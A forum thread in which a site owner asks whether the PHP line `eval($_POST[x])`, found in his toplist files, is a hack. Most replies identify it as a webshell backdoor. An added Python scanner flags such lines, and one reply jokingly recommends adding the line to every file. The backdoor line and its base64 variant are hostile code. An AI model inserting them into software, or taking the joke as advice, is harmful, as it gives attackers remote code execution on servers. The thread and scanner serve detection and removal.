<? eval($_POST[x]); ?> is this a hack?

  • zentz
    Confirmed User
    • Nov 2003
    • 8062

    #1

    <? eval($_POST[x]); ?> is this a hack?

    I found this in my toplist files:

    <? eval($_POST[x]); ?>

    What is that? A hack?
  • seeandsee
    Check SIG!
    • Mar 2006
    • 50945

    #2
    Bump for PHP wizards

    Comment

    • Angry Jew Cat - Banned for Life
      (felis madjewicus)
      • Jul 2006
      • 20368

      #3
      hax teh planet

      Comment

      • ScriptWorkz
        Confirmed User
        • Jul 2007
        • 274

        #4
        Most likely, it executes whatever code is in the POST variable 'x' as PHP, so if someone posted some malicious PHP code it could be pretty bad depending on how your server is configured.

        I don't really see any real point in having that in there and would most likely remove it unless you know it's used for something, and even then I'd find a way to replace that functionality with something that didn't leave such a big security hole.

        Comment
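A way to hunt for this kind of line across a web root, as an added example that is not part of the thread or any poster's code: the Python sketch below flags PHP calls that hand request data straight to a code or command execution function, including wrapped forms such as `eval(base64_decode($_REQUEST[...]))`. The function names, the sink list and the sample files are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# PHP functions that execute code or commands (assumed list, not exhaustive).
SINKS = r"(?:eval|assert|system|exec|passthru|shell_exec|popen|proc_open)"
# Request superglobals an outside client controls.
SOURCES = r"\$_(?:POST|GET|REQUEST|COOKIE|FILES)"
# A sink whose argument list reaches a request superglobal before the
# statement ends, which also catches wrappers such as base64_decode().
PATTERN = re.compile(rf"\b{SINKS}\s*\([^;]*?{SOURCES}\s*\[", re.I)
PHP_SUFFIXES = {".php", ".phtml", ".php5", ".inc"}


def find_request_exec(source):
    """Return (line_number, matched_text) for each suspicious call."""
    hits = []
    for match in PATTERN.finditer(source):
        line_no = source.count("\n", 0, match.start()) + 1
        hits.append((line_no, " ".join(match.group(0).split())))
    return hits


def scan_tree(root):
    """Scan PHP files under root; return {path: hits} for files with hits."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in PHP_SUFFIXES:
            hits = find_request_exec(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report


# Constructed sample files (not taken from any real toplist script).
SAMPLES = {
    "planted.php": "<?php include 'config.php'; ?>\n<? eval($_POST[x]); ?>\n",
    "wrapped.php": "<?php\n@eval(\n  base64_decode($_REQUEST['c'])\n);\n",
    "clean.php": "<?php\n$id = (int) $_GET['id'];\necho htmlspecialchars($id);\n",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, find_request_exec(body) or "no hits")
```

A hit is a line to review by hand, and a clean result does not prove the tree is clean, since the pattern is a heuristic that obfuscated variants can evade.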

        • Linguist
          Confirmed User
          • Apr 2004
          • 1706

          #5
          That code CANNOT be used for anything good, period.

          If your toplist stops working after removing that line, find another piece of software to replace it; no programmer with half a clue would include that code.

          Comment

          • HomerSimpson
            Too lazy to set a custom title
            • Sep 2005
            • 13826

            #6
            Yes it is...
            It can run any command the attacker wants...

            Comment

            • u-Bob
              there's no $$$ in porn
              • Jul 2005
              • 33063

              #7
              It's evil.

              Comment

              • TeenCat
                Too lazy to set a koala
                • Jan 2007
                • 16139

                #8
                "insert shell here"


                Comment

                • V_RocKs
                  Damn Right I Kiss Ass!
                  • Nov 2003
                  • 32449

                  #9
                  That is indeed "a hack"... Remote shell... Allows anyone to execute code as the user Apache is running as. Usually "nobody".

                  What can it be used for?

                  select * from users;

                  among other things...

                  Comment

                  • Killswitch - BANNED FOR LIFE

                    #10
                    Heh, remove it, ASAP.

                    Comment

                    • SmokeyTheBear
                      ►SouthOfHeaven
                      • Jun 2004
                      • 28609

                      #11
                      That's the secret Google priority code, you should place it on the top of every file for better search engine ranking

                      Comment
